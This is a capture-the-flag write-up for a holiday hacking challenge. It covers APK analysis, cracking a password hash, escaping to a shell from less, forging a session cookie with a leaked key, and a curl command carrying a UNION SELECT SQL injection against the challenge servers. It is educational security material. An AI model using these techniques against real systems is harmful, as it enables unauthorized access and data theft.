Looking at the business card, we see that Santa seems to be into extensive social media use. On his twitter account, we see a large number of posts (350), mostly composed of Christmas-themed words (JOY, PEACEONEARTH, etc.), but occasionally with a number of symbols in the center. At first I thought it might be some kind of encoding, so I decided to download the tweets to a file and examine them as plaintext. I did this with a bit of javascript to pull the right elements into a single file. I was about to start trying various decoding techniques when I happened to notice a pattern:

Well, perhaps the hidden message is “BUG BOUNTY”. (Question #1) (Image wrapped for readability.) I’m not sure what to do with it at this point, but perhaps it will become clear later.

Let’s switch to Instagram and take a look there. The first two photos appear unremarkable, but the third one is cluttered with potential clues. One of Santa’s elves (Hermey) is apparently as good at keeping a clean desk as I am – just ask my coworkers! Fortunately they don’t Instagram-shame me. :)

Using our “enhance” button from the local crime-solving TV show, we find a couple of clues.

We have a domain (or at least part of one) from an nmap report, and a filename. I wonder if they go together: https://www.northpolewonderland.com/SantaGram_4.2.zip. Indeed they do, and we have a zip file. Unzipping it, we discover it’s encrypted. Unsure what else to try, I try variations of “BUG BOUNTY” from Twitter, and it works for me. (Turns out the password is lower case, though.) Inside the zip file, we find an APK for SantaGram with SHA-1 78f950e8553765d4ccb39c30df7c437ac651d0d3. (Question #2)

Part 2: Awesome Package Konveyance

With the APK in hand, we decide to start hunting for interesting artifacts inside. With a simple apktool d, we extract all the files inside, resulting in resources, smali code, and a handful of other files. Hunting for usernames and passwords, I decide to use ack (http://beyondgrep.com/), a grep-like tool with some enhanced features. A quick search for the strings username and password reveals a number of potential options. I could check manually, but well, I’m lazy. Instead, I use ack -A 5, which shows 5 lines of context after each match. Paging through these results, I spot a likely candidate:

Inside this same smali file, I find a password a few lines further down:

:try_start_0
const-string v1, "username"
const-string v2, "guest"
invoke-virtual {v0, v1, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
const-string v1, "password"
const-string v2, "busyreindeer78"

Now we have a username and password pair: guest:busyreindeer78. (Question #3) Cool. I don’t know what they’re good for, but collecting credentials can always come in handy later.

The challenge also mentions an audio file. I don’t know if it’s embedded in source, a resource by itself, or what, but I’m going to take a guess that it’s a large file. find is useful in these cases:

% find . -size +100k
./smali/android/support/v7/widget/StaggeredGridLayoutManager.smali
./smali/android/support/v7/widget/ao.smali
./smali/android/support/v7/widget/Toolbar.smali
./smali/android/support/v7/widget/LinearLayoutManager.smali
./smali/android/support/v7/a/l.smali
./smali/android/support/v4/b/s.smali
./smali/android/support/v4/widget/NestedScrollView.smali
./smali/android/support/design/widget/CoordinatorLayout.smali
./smali/com/parse/ParseObject.smali
./res/drawable/launch_screen.png
./res/drawable/demo_img.jpg
./res/raw/discombobulatedaudio1.mp3

There are quite a few more files than I expected in the relevant size range, but it’s easy to find the MP3 file in the bunch with just a glance. I guess the name of the audio file is discombobulatedaudio1.mp3. (Question #4.)

Part 3: A Fresh-Baked Holiday Pi

After running around for a while, hunting for pieces of the Cranberry Pi, I’m able to put the pieces together, and the helpful Holly Evergreen provides a link to the Cranberry Pi image.

After downloading the image, I’m able to map the partitions (using a great tool named kpartx) and mount the filesystem, then extract the password hash.

% sudo kpartx -av ./cranbian-jessie.img
add map loop3p1 (254:7): 0 129024 linear 7:3 8192
add map loop3p2 (254:8): 0 2576384 linear 7:3 137216
% sudo mount /dev/mapper/loop3p2 data
% sudo grep cranpi data/etc/shadow
cranpi:$6$2AXLbEoG$zZlWSwrUSD02cm8ncL6pmaYY/39DUai3OGfnBbDNjtx2G99qKbhnidxinanEhahBINm/2YyjFihxg7tgc343b0:17140:0:99999:7:::

This is a standard Unix SHA-512 crypt hash (the $6$ prefix) – slow, but workable. Fortunately, Minty Candycane of Rudolph’s Red Team has helped us out there by pointing to John the Ripper and the RockYou password list. (Shout out to @iagox86 for hosting the best collection of password lists around.)

Throwing the hash up on a virtual machine with a few cores and running john with the rockyou list for a little while, we discover Santa’s top secret password: yummycookies. (Question #5) After we let Holly Evergreen know that we’ve found the password, she tells us that we’ll be able to use the terminals around the North Pole to unlock the doors. Time to head to the terminals.

Terminal: Elf House #2

The first door I ran to is Elf House #2. Opening the terminal, we’re told to find the password in the /out.pcap file, but we’re running as the user scratchy, and the user itchy owns the file. After spending some time over-thinking the problem, I run sudo -l to see if I can run anything as root or itchy, and discover a couple of useful tools:

(itchy) NOPASSWD: /usr/sbin/tcpdump
(itchy) NOPASSWD: /usr/bin/strings

Like any good hacker, I go straight to strings and discover the first part of the password:

sudo -u itchy /usr/bin/strings /out.pcap
…
<input type="hidden" name="part1" value="santasli" />
…

I played around with tcpdump to try to extract the second part as a file, but could never get anything I was able to reconstruct into anything meaningful. I thought about trying to exfiltrate the file to my local box for wireshark, but I decided I wanted to push to solve it only with the tools I had available to me. I look at my options with tcpdump and try the -A flag (giving ASCII output) to see what I can see. Paging through it, I noticed an area where I saw the string “part2”, but only in every-other character. I gave strings another try, this time checking for little-endian UTF-16 characters:

sudo -u itchy /usr/bin/strings -e l /out.pcap
part2:ttlehelper

Putting the parts together, we have “santaslittlehelper” and we’re in!
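The trick above (one half of the secret in plain ASCII, the other only visible as little-endian UTF-16) is easy to reproduce in code. The following is an added example, not part of the original writeup: a small re-implementation of what strings and strings -e l do, run over a constructed byte string that imitates the relevant part of the pcap. The sample bytes and the recover_door_password helper are my own constructions.

```python
import re

# Constructed sample standing in for /out.pcap: a pcap header fragment, an HTML
# input carrying part1 as ASCII, then part2 encoded as little-endian UTF-16.
SAMPLE_PCAP_FRAGMENT = (
    b"\xd4\xc3\xb2\xa1\x02\x00\x04\x00"                  # pcap magic + version
    b'<input type="hidden" name="part1" value="santasli" />\r\n'
    + "part2:ttlehelper".encode("utf-16-le")               # invisible to plain strings
    + b"\x00\x00\xff\xfe"                                   # trailing noise
)

PRINTABLE = set(range(0x20, 0x7F))  # the printable ASCII range strings(1) accepts


def ascii_strings(data: bytes, min_len: int = 4) -> list:
    """Equivalent of plain `strings`: runs of at least min_len printable bytes."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def utf16le_strings(data: bytes, min_len: int = 4) -> list:
    """Equivalent of `strings -e l`: printable ASCII code points, each stored as
    the byte followed by 0x00. The scan advances one byte at a time when no
    character matches, so runs at odd offsets are found as well."""
    found, run, i = [], [], 0
    while i + 1 < len(data):
        lo, hi = data[i], data[i + 1]
        if hi == 0 and lo in PRINTABLE:
            run.append(chr(lo))
            i += 2
            continue
        if len(run) >= min_len:
            found.append("".join(run))
        run = []
        i += 1
    if len(run) >= min_len:
        found.append("".join(run))
    return found


def recover_door_password(data: bytes):
    """Join part1 (ASCII form field) and part2 (UTF-16LE text) if both are present."""
    part1 = part2 = None
    for s in ascii_strings(data):
        m = re.search(r'name="part1" value="([^"]*)"', s)
        if m:
            part1 = m.group(1)
    for s in utf16le_strings(data):
        m = re.search(r"part2:(\S+)", s)
        if m:
            part2 = m.group(1)
    return part1 + part2 if part1 and part2 else None


if __name__ == "__main__":
    print(ascii_strings(SAMPLE_PCAP_FRAGMENT))
    print(utf16le_strings(SAMPLE_PCAP_FRAGMENT))
    print(recover_door_password(SAMPLE_PCAP_FRAGMENT))
```

The same scan is what an analyst would run over any capture or binary where the plain strings output looks suspiciously sparse: wide-character text hides from the ASCII pass entirely.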

Terminal: Workshop

The first of two doors in the workshop is up the candy-cane striped stairs.

The challenge here is simple: find the password in the deeply nested directory structure. I decided to see what files existed at all with a quick find:

$ find . -type f
./.bashrc
./.doormat/. / /\/\\/Don't Look Here!/You are persistent, aren't you?/'/key_for_the_door.txt
./.profile
./.bash_logout

That was easy, but I suppose we need the contents. I don’t want to deal with all the special characters and directories (remember, I’m lazy) so I just let find do the work for me:

$ find . -type f -name 'key*' -exec cat {} \;
key: open_sesame

This leads us into Santa’s office, which presents us with another terminal on the back wall.

Terminal: Santa’s Office

As I said, we’re in Santa’s office with another terminal on the back wall, but no obvious door. It turns out the bookcase there is the hidden door!

Getting back to the terminal, I’m prompted with GREETINGS PROFESSOR FALKEN. Immediately, I recognize this as a line from the WOPR in the movie WarGames. After a few errant entries, I realize it wants me to dialog with it in exactly the same way as the movie. (This was a painstaking exercise in transcribing YouTube.)

GREETINGS PROFESSOR FALKEN.
Hello.
HOW ARE YOU FEELING TODAY?
I'm fine. How are you?
EXCELLENT, IT'S BEEN A LONG TIME. CAN YOU EXPLAIN THE REMOVAL OF YOUR USER ACCOUNT ON 6/23/73?
People sometimes make mistakes.
YES THEY DO. SHALL WE PLAY A GAME?
Love to. How about Global Thermonuclear War?
WOULDN'T YOU PREFER A GOOD GAME OF CHESS?
Later. Let's play Global Thermonuclear War.
FINE
[ASCII-art world map: UNITED STATES / SOVIET UNION]
WHICH SIDE DO YOU WANT?
1. UNITED STATES
2. SOVIET UNION
PLEASE CHOOSE ONE: 2
AWAITING FIRST STRIKE COMMAND
-----------------------------
PLEASE LIST PRIMARY TARGETS BY CITY AND/OR COUNTRY NAME:
Las Vegas
LAUNCH INITIATED, HERE'S THE KEY FOR YOUR TROUBLE: LOOK AT THE PRETTY LIGHTS

That was painful, but not difficult. It was incredibly unforgiving when it came to typos; even a single stray space required retyping the sentence (though fortunately not the whole transaction).

Through the door, we find ourselves in “The Corridor” with another locked door, but this time, no terminal. I tried a few obvious passwords anyway, but had no luck with that.

Terminal: Workshop (Reindeer)

There’s a second door in the workshop, next to a few of Santa’s reindeer. (If anyone figures out whether reindeer really moo, please let me know…)

Find the passphrase from the wumpus. Play fair or cheat; it's up to you.

I was going to cheat, but first I wanted to get the lay of the game, so I wandered a bit and fired a few arrows, and happened to hit the wumpus – no cheating necessary! (I’m not sure if randomly playing is “playing fair”, but hacking is about what works!)

Move or shoot? (m-s) s
6
*thwock!* *groan* *crash*
A horrible roar fills the cave, and you realize, with a smile, that you
have slain the evil Wumpus and won the game! You don't want to tarry for
long, however, because not only is the Wumpus famous, but the stench of
dead Wumpus is also quite well known, a stench plenty enough to slay the
mightiest adventurer at a single whiff!!
Passphrase: WUMPUS IS MISUNDERSTOOD

Terminal: Workshop - Train Station

On the train, there’s another terminal. It proclaims to be the Train Management Console: AUTHORIZED USERS ONLY. Running a few commands, I soon discovered that BRAKEOFF works, but START requires a password which I don’t have. Looking at the HELP documentation, I noticed something odd:

Help Document for the Train
**STATUS** option will show you the current state of the train (brakes, boiler, boiler temp, coal level)
**BRAKEON** option enables the brakes. Brakes should be enabled at every stop and while the train is not in use.
**BRAKEOFF** option disables the brakes. Brakes must be disabled before the **START** command will execute.
**START** option will start the train if the brake is released and the user has the correct password.
**HELP** brings you to this file. If it's not here, this console cannot do it, unLESS you know something I don't.

It seemed strange that unLESS had the unusual capitalization, but then I realized the help document was probably being displayed with GNU less. Does less have shell functionality, similar to vim and other editors? The more-or-less universal command to start a shell is a bang (!), so I gave it a try and was dropped into a shell. At first I thought about looking for the password (and you can discover it), but then I realized I could just run ActivateTrain directly.

It turns out the train is a time machine to 1978. (I wonder if that’s related to the guest password we found earlier – busyreindeer78. Guess we’ll find out soon.)

1978: Finding Santa

So I arrived in 1978 and quite frankly, had no idea what I should do. I still needed more NetWars challenge coins (man, what I wouldn’t give for a real-life NetWars challenge coin, but since I’ve never been to a NetWars event, my trophy case remains empty), so I decided to wander and find whatever I found. Guess what I found? Santa! He was in the DFER (Dungeon for Errant Reindeer), but could not remember how he got there.

Part 4: My Gosh… It’s Full of Holes

If we use ack again to find URLs containing “northpolewonderland.com” (which was just a bit of a guess from seeing one or two of these URLs when looking for credentials), we find a number of candidate URLs:

% ack -o "[a-z]+\.northpolewonderland\.com" values/strings.xml
24:analytics.northpolewonderland.com
25:analytics.northpolewonderland.com
29:ads.northpolewonderland.com
32:dev.northpolewonderland.com
34:dungeon.northpolewonderland.com
35:ex.northpolewonderland.com

We can then retrieve the IP addresses for each of these hosts using our trusty DNS tool dig:

% dig +short {ads,analytics,dev,dungeon,ex}.northpolewonderland.com
104.198.221.240
104.198.252.157
35.184.63.245
35.184.47.139
104.154.196.33

Taking each of these IPs to our trusty Tom Hessman, we find that each of them is in scope for our testing, but we are advised to keep our traffic reasonable.

analytics.northpolewonderland.com

I started by doing a quick NMAP scan of the host – it’s good to know what’s running on a machine, and sometimes you can reveal some interesting info with the default set of scripts. In fact, that turned out to be extremely handy in this particular case:

% nmap -F -sC analytics.northpolewonderland.com
Starting Nmap 7.31 ( https://nmap.org )
Nmap scan report for analytics.northpolewonderland.com (104.198.252.157)
Host is up (0.065s latency).
rDNS record for 104.198.252.157: 157.252.198.104.bc.googleusercontent.com
Not shown: 98 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
| ssh-hostkey:
|   1024 5d:5c:37:9c:67:c2:40:94:b0:0c:80:63:d4:ea:80:ae (DSA)
|   2048 f2:25:e1:9f:ff:fd:e3:6e:94:c6:76:fb:71:01:e3:eb (RSA)
|_  256 4c:04:e4:25:7f:a1:0b:8c:12:3c:58:32:0f:dc:51:bd (ECDSA)
443/tcp open  https
| http-git:
|   104.198.252.157:443/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: Finishing touches (style, css, etc)
| http-title: Sprusage Usage Reporter!
|_Requested resource was login.php
| ssl-cert: Subject: commonName=analytics.northpolewonderland.com
| Subject Alternative Name: DNS:analytics.northpolewonderland.com
| Not valid before: 2016-12-07T17:35:00
|_Not valid after:  2017-03-07T17:35:00
|_ssl-date: TLS randomness does not represent time
| tls-nextprotoneg:
|_  http/1.1

You’ll notice that the nmap http-git script was successful in this case. This is a not-uncommon finding when developers use git to deploy an application directly to the document root (very common in the case of PHP applications, which is likely the case here due to the redirect to ‘login.php’). This is great, because we can download the entire git repository, which will allow us to look for secrets, credentials, hidden handlers, or at least better understand the application.

Now, it’s not possible to directly clone this over http because nobody ran git update-server-info, as they weren’t intending to share this over the network. But that’s okay with directory indexing enabled: we can just mirror all the files with wget, then clone out a working repository:

% wget --mirror https://analytics.northpolewonderland.com/.git
…
Downloaded: 314 files, 1003K in 0.4s (2.68 MB/s)
% git clone analytics.northpolewonderland.com/.git analytics
Cloning into 'analytics'...
done.

Looking at the source, we find a few interesting files (given that we know an audio file is at least one of our goals): there’s a getaudio.php that returns a download of an mp3 file from the database (storing the whole MP3 in a database column isn’t the design choice I would have made, but I suppose I’ll be discovering a lot of design choices I wouldn’t have made). It’s noteworthy that the only user it will allow to download a file is the user guest. I decided to try logging in with the credentials we found in the app earlier (guest:busyreindeer78), and was straight in. Conveniently, the top of the page has a link labeled “MP3”, and a click later we have discombobulatedaudio2.mp3.

That was easy, but I have reason to believe we’re not done here – if for no reason other than the fact that there are 2 references to the analytics server in the challenge description. There’s also quite a bit of functionality we haven’t tried out yet. I spent a few minutes reviewing the SQL queries in the application. They’re not parameterized queries (again, differing design decisions) but the liberal use of mysqli_real_escape_string seems to prevent any obvious SQL injection.

One notable feature is the ability to save analytics reports. It’s particularly notable that the way in which they are saved is by storing the final SQL query into a column in the reports table. There’s also an ‘edit’ function for these saved queries, which seems to be designed just for renaming the saved reports, but if we look at the code, we easily see that we can edit any column stored in the database, including the stored SQL query. I’m honestly not sure what the right term is for this vulnerability (SQL injection implies injecting into an existing query, after all), but it’s clearly a vulnerability that will let us read arbitrary data from the database – including the stored MP3s, assuming we can access the edit functionality.

Code allowing any column to be updated:

$row = mysqli_fetch_assoc($result);
# Update the row with the new values
$set = [];
foreach($row as $name => $value) {
  print "Checking for " . htmlentities($name) . "...<br>";
  if(isset($_GET[$name])) {
    print 'Yup!<br>';
    $set[] = "$name='".mysqli_real_escape_string($db, $_GET[$name])."'";
  }
}
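The loop above derives the updatable columns from the fetched row, so escaping the values (which mysqli_real_escape_string does correctly) cannot help: the attacker-controlled part is the column name, not the value. The added example below recasts that loop in Python, beside the form a reviewer would ask for: an explicit allowlist of editable columns plus bound parameters. It is not the challenge’s own code; the sample row, the reports table name and the EDITABLE tuple are my assumptions (the report id is the one from the writeup’s URL).

```python
# Constructed row, as edit.php would get it from mysqli_fetch_assoc() on the
# reports table. The stored SQL lives in the `query` column.
REPORT_ROW = {
    "id": "1147b606-4d2f-4faa-b771-a55e03307367",
    "name": "launch report",
    "description": "weekly",
    "query": "SELECT * FROM `app_launch_reports` LIMIT 0, 100",
}

# What the rename feature actually needs to touch.
EDITABLE = ("name", "description")


def columns_updated_vulnerable(row, params):
    """Mirrors the edit.php loop: any column present in the fetched row becomes
    updatable if a request parameter of the same name exists. Escaping the
    value does nothing about the fact that `query` is on this list."""
    return [name for name in row if name in params]


def build_update_safe(table, row_id, params, editable=EDITABLE):
    """Hardened form: only allowlisted columns may be set, identifiers come from
    a constant tuple (never from the request), and values are bound parameters.
    Returns (sql, values) or (None, ()) when nothing permitted was supplied."""
    assignments = [(col, params[col]) for col in editable if col in params]
    if not assignments:
        return None, ()
    sql = (
        f"UPDATE `{table}` SET "
        + ", ".join(f"`{col}`=?" for col, _ in assignments)
        + " WHERE `id`=?"
    )
    return sql, tuple(value for _, value in assignments) + (row_id,)


def apply_edit(row, params, columns):
    """Row as it would look after an UPDATE limited to `columns` (no DB needed)."""
    updated = dict(row)
    for col in columns:
        if col in params:
            updated[col] = params[col]
    return updated


if __name__ == "__main__":
    # A rename request that smuggles a replacement for the stored query.
    request = {"name": "foo", "description": "bar",
               "query": "SELECT `id`,`username`,`filename`,hex(`mp3`) FROM audio"}
    print(columns_updated_vulnerable(REPORT_ROW, request))
    print(apply_edit(REPORT_ROW, request, columns_updated_vulnerable(REPORT_ROW, request))["query"])
    print(build_update_safe("reports", REPORT_ROW["id"], request))
    print(apply_edit(REPORT_ROW, request, EDITABLE)["query"])
```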

This edit function is allegedly restricted to not allow any users access:

(edit.php)

# Don't allow anybody to access this page (yet!)
restrict_page_to_users($db, []);

However, if we investigate the restrict_page_to_users function, we find that it calls check_access from db.php, which contains this code:

(db.php)

function check_access($db, $username, $users) {
  # Allow administrator to access any page
  if($username == 'administrator') {
    return;
  }

We now know that there’s probably an “administrator” user and that getting to that will allow us to access the edit.php page. Unfortunately, we don’t have credentials to log in as administrator, and we can’t use our arbitrary SQL to read the credentials until we have access. Stuck in a Catch-22? Not quite: who said we have to log in?

Earlier I foreshadowed the value of having access to the git repository for the site: session cookies are encrypted with symmetric crypto, and the key is available in the git repository:

define('KEY', "\x61\x17\xa4\x95\xbf\x3d\xd7\xcd\x2e\x0d\x8b\xcb\x9f\x79\xe1\xdc");

This allows us to encrypt our own session cookie as administrator. I hacked together a short script to create a new AUTH cookie:

<?php
include('crypto.php');
print encrypt(json_encode([
  'username' => 'administrator',
  'date' => date(DateTime::ISO8601),
]));

Using my favorite cookie-editing extension to update my cookie, I quickly discover that the edit functionality is now available. Now, the edit page doesn’t provide an input field for the query, but thanks to Burp Suite, it’s easy enough to add my own parameter and edit the query. Based on getaudio.php, I know the schema for the audio table, so I craft a query to get it. Lacking an easy way to return the binary data directly (I can only execute this query within the context of an HTML page), I decide to return the MP3 encoded as a string. Base64 would probably be ideal to minimize overhead, but the TO_BASE64 function was added in MySQL 5.6 and I was too lazy to query the version from the database, so I encoded as hex instead.

I wanted the following query: SELECT `id`,`username`,`filename`,hex(`mp3`) FROM audio, so I POST’d to the following URL:

https://analytics.northpolewonderland.com/edit.php?id=1147b606-4d2f-4faa-b771-a55e03307367&name=foo&description=bar&query=SELECT+`id`,`username`,`filename`,hex(`mp3`)+FROM+audio

Then I ran the report with the saved report functionality, and extracted the hex and decoded it to reveal the other MP3 file. Based on the filename stored in the report, I saved it to my audio directory with the name discombobulatedaudio7.mp3. From the query results, we know these are the only 2 MP3s in the audio table, so it seems like it’s time to move on to the next server, but I decided to grab the passwords from the users table by updating the query again, just in case they might be useful later:

Addendum: An Unintentional Vulnerability

After finishing all of the challenges, I happened to be looking back at this one when I discovered a 2nd vulnerability, which I suspect was not intended as part of the challenge. If you look at the file query.php, you’ll notice it does a number of input validation checks, each looking something like this:

if(!ctype_alpha($field)) {
  reply(400, "Field name can only contain letters!");
  die();
}

You’ll notice the reply function sets the HTTP status code and prints a message, then the script dies to prevent further execution. However, if you look further down (line 178), you’ll discover this check and query construction:

$type = $_REQUEST['type'];
if($type !== 'launch' && $type !== 'usage') {
  reply(400, "Type has to be either 'launch' or 'usage'!");
}

$query = "SELECT * ";
$query .= "FROM `app_" . $type . "_reports` ";
$query .= "WHERE " . join(' AND ', $where) . " ";
$query .= "LIMIT 0, 100";

Though it appears the author intended to limit type to the strings ‘launch’ and ‘usage’, the lack of a call to die() in the error handler results in the query being executed and results returned anyway! So we can inject into the type field and steal the mp3 files using a UNION SELECT SQL injection:

curl 'https://analytics.northpolewonderland.com/query.php' -H 'Cookie: AUTH=82532b2136348aaa1fa7dd2243dc0dc1e10948231f339e5edd5770daf9eef18a4384f6e7bca04d87e572ba65ce9b6548b3494b6063a30265b71c76884152' -H 'Content-Type: application/x-www-form-urlencoded' --data 'date=2017-01-05&type=usage_reports` LIMIT 0 UNION SELECT id,username,filename,to_base64(mp3),NULL from audio -- '

ads.northpolewonderland.com

The nmap results for this host were rather unremarkable: essentially, yes, it’s a webserver. Visiting the full URL from the APK, the site directly returns an image file (no link? I guess these banner ads are for brick-and-mortar stores), so navigating to the root, we find the administration site for the ad system.

Fortunately, I had happened upon a helpful elf who informed me about this “Meteor” javascript framework, and the MeteorMiner script for extracting information from Meteor. Unfortunately, I had never seen Meteor before, so I had no idea what was going on. After trying some braindead attempts to steal the credentials for an administrator (Meteor.users.find().fetch() returned nothing), I attempted to register a new account to see if I could get access to more interesting functionality that way, but was repeatedly rebuffed by the site:

I began to look into how Meteor manages users, and guessed that they were using the default user management package. According to the documentation, you could add users for testing by calling the createUser method:

Accounts.createUser({password:'matirwuzhere', username:'matir'})

It turns out that this worked to create a user, and even directly logged me in as that user. Unfortunately, all of the pages still gave me a response of “You must be logged in to access this page”. I clicked around and generated dozens of requests and didn’t realize anything had meaningfully changed until I noticed that MeteorMiner was reporting a 5th member of the HomeQuote collection. Examining the collection in the JavaScript console revealed my prize: the path to an audio file, discombobulatedaudio5.mp3:

dev.northpolewonderland.com

Nmap gets us nothing here: just HTTP and SSH open. Visiting the webserver, we find nothing, literally. Just a “200 OK” response with no content. I can’t dirbuster (thanks Tom!), so how can I figure out what the web application might be doing?

Well, I have essentially two options: I can analyze the SantaGram APK, maybe use dex2jar and JAD (or another Java decompiler) to have semi-readable source, or maybe I can run the APK in an emulator and capture requests with Burp Suite. For several reasons, I decide to go with the 2nd route, not the least of which is that I spend a lot of time in Burp during my day-to-day, so I’ll be using the tools I’m more familiar with.

So I fire up the Android emulator with the proxy set to my Burp instance, install SantaGram with adb, and start playing with the app. It turns out this is another place that we can use the guest:busyreindeer78 credentials to log in, but no matter what I do in the app, I can’t seem to see any requests for dev.northpolewonderland.com. Looking at res/values/strings.xml from the APK, I see an important entry adjacent to the dev.northpolewonderland.com entry:

<string name="debug_data_collection_url">
  http://dev.northpolewonderland.com/index.php</string>
<string name="debug_data_enabled">false</string>

Well, I suppose it’s not sending requests to dev because debug_data_enabled is false. Let’s change that to true and rebuild the APK:

% apktool b -o santagram_mod.apk santagram
% /tmp/apk-resigner/signapk.sh ./santagram_mod.apk
% adb install santagram_mod.apk
% adb uninstall com.northpolewonderland.santagram
% adb install signed_santagram_mod.apk

It turns out rebuilding the APK was more troublesome than I anticipated because it needed to be resigned, and then the resigned one couldn’t be installed because it used a different key than the existing one, so I needed to uninstall the HHC SantaGram and install mine. (Clearly I need to do more mobile assessments.)

With the debug-enabled version installed, it was time to play with the app some more. While debugging the lack of debug requests, I noticed several references to the debug code in the user profile editing class, so I decided to give that a try and noticed (finally!) requests to dev.northpolewonderland.com.

POST /index.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K)
Host: dev.northpolewonderland.com
Connection: close
Accept-Encoding: gzip
Content-Length: 144

{"date":"20161230120936-0800","udid":"71b4a03e1f1b4e1c","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":66806400}

HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Fri, 30 Dec 2016 20:09:37 GMT
Content-Type: application/json
Connection: close
Content-Length: 250

{"date":"20161230200937","status":"OK","filename":"debug-20161230200937-0.txt","request":{"date":"20161230120936-0800","udid":"71b4a03e1f1b4e1c","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":66806400,"verbose":false}}

I noticed that the entire request is included in the response, plus a new field is added to the JSON: "verbose":false. Can we include that in the request, and maybe switch it to true? I send the request to Burp Repeater and add the verbose field, set to true:

POST /index.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K)
Host: dev.northpolewonderland.com
Connection: close
Accept-Encoding: gzip
Content-Length: 159

{"date":"20161230120936-0800","udid":"71b4a03e1f1b4e1d","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":66806400,"verbose":true}

Unsurprisingly, the response changes, but we get far more than extra detail about our own debug message!

HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Fri, 30 Dec 2016 23:01:56 GMT
Content-Type: application/json
Connection: close
Content-Length: 465

{"date":"20161230230156","date.len":14,"status":"OK","status.len":"2","filename":"debug-20161230230156-0.txt","filename.len":26,"request":{"date":"20161230120936-0800","udid":"71b4a03e1f1b4e1d","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":66806400,"verbose":true},"files":["debug-20161224235959-0.mp3","debug-20161230224818-0.txt","debug-20161230225810-0.txt","debug-20161230230155-0.txt","debug-20161230230156-0.txt","index.php"]}

You’ll notice we got a listing of all the files in the current directory (they must be cleaning that up periodically!), including an mp3 file. Could this be the next discombobulatedaudioN.mp3? I download the file and get something of approximately the right size, but it’s not clear which of the discombobulated files it will be. All of the others had a filename in the discombobulated format (at least nearby, if not directly) so I set this one aside to be renamed later.

dungeon.northpolewonderland.com

Initial nmap results for dungeon.northpolewonderland.com weren’t revealing anything too interesting. Visiting the webserver, I found what appears to be the help documentation for a Zork-style dungeon game. I remembered one of the elves offering up a copy of a game from a long time ago, so I went back and downloaded it.

I started playing the game briefly but, for as much as I love RPGs (I used to run several MUDs back in the 90s), I was impatient and wanted to get on with the Holiday Hack Challenge. I started with the obvious: running strings on both the binary and the data file, but that made very little headway. I then looked at Zork data file editors, but the first couple I found couldn’t decompile the provided data file (whether this is by accident, by design of the challenge, or because I picked the wrong tools, I have no idea), so that proved not to be useful either. However, on one of the sites where I was reading about reversing Zork games, I discovered a mention of a built-in debugger called GDT, the Game Debugger Tool. Among other things, GDT lets you dump all the information about NPCs, the strings in the game, etc. Much as I would use GNU strings to get oriented in an unknown binary, I decided to use the GDT string dump to find all of the in-game strings. Unfortunately, GDT requires a string index and dumps one entry at a time. Not knowing how many strings there were, I picked 2048 as a starting point and wrote a little inline shell loop to dump them. I discovered that it starts to crash after about 1279, and the last handful seemed to be garbage (OK, no bounds checking; I wonder what else I could do?), so I adjusted my 2048 to 1200 and tried again:

for i in $(seq 1 1200); do
  echo -n "$i: "
  echo -e "GDT\nDT\n$i\nEX\nquit\ny" | \
    ./dungeon 2>/dev/null | \
    tail -n +5 | \
    head -n -3
done

This produced a surprisingly readable strings table, except for some garbage at the end. (It appears the correct number of strings is 1027 for this particular game file.) At a quick glance, I noticed some references to an “elf” near the end, while the rest of them seemed like pretty standard Zork gameplay. Most interesting seemed to be this line:

1024: >GDT>Entry: The elf, satisified with the trade says -
Try the online version for the true prize

Well great, I need to find an online version, but I didn’t find a clue as to where it would be from the webpage with instructions, nor did the rest of the strings in the offline version offer a hint. When in doubt – more recon! Time for a full NMAP scan (but I’ll leave scripts off in the interest of time):

Starting Nmap 7.31 ( https://nmap.org )
Nmap scan report for dungeon.northpolewonderland.com (35.184.47.139)
Host is up (0.066s latency).
rDNS record for 35.184.47.139: 139.47.184.35.bc.googleusercontent.com
Not shown: 64989 closed ports, 543 filtered ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
11111/tcp open  vce

Nmap done: 1 IP address (1 host up) scanned in 46.16 seconds

Aha! Port 11111 is open. I imagine netcat will give us an instance of the dungeon game. My first question is whether the “Try the online version for the true prize” string says something different:

% nc dungeon.northpolewonderland.com 11111
Welcome to Dungeon.                     This version created 11-MAR-78.
You are in an open field west of a big white house with a boarded
front door.
There is a small wrapped mailbox here.
>GDT
GDT>DT
Entry:    1024
The elf, satisified with the trade says -
send email to "peppermint@northpolewonderland.com" for that which you seek.

That was surprisingly easy – I really expected to need to do more. Maybe it’s misleading? I send an email off to Peppermint and wait with anticipation for Santa’s elves to do their work.

It turns out it really was that easy! Moments later, I have an email from Peppermint with an attachment: it’s discombobulatedaudio3.mp3!

ex.northpolewonderland.com

One last server to go! This server is apparently for handling uncaught exceptions from the application. To figure out what kind of traffic it’s seeing, I decided to try to trigger an exception in the application running in the emulator (still going from my work on dev.northpolewonderland.com). I actually stumbled upon this by mistake: if you change the device to be emulated to a Nexus 6, the application crashes and sends a crash report to ex.northpolewonderland.com.

POST /exception.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K)
Host: ex.northpolewonderland.com
Connection: close
Accept-Encoding: gzip
Content-Length: 3860

{"operation":"WriteCrashDump","data":{...}}

I’ve omitted the contents of “data” in the interest of space, but it mostly contained the traceback of the exception that was thrown. Interestingly, the response indicates that crashdumps are stored with a PHP extension, so my first thought was to try to include PHP code in the backtrace, but that never worked out (the code wasn’t being executed). I’m assuming the PHP interpreter wasn’t turned on for that directory.

HTTP/1.1 200 OK
Server: nginx/1.10.2
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 81

{
  "success" : true,
  "folder" : "docs",
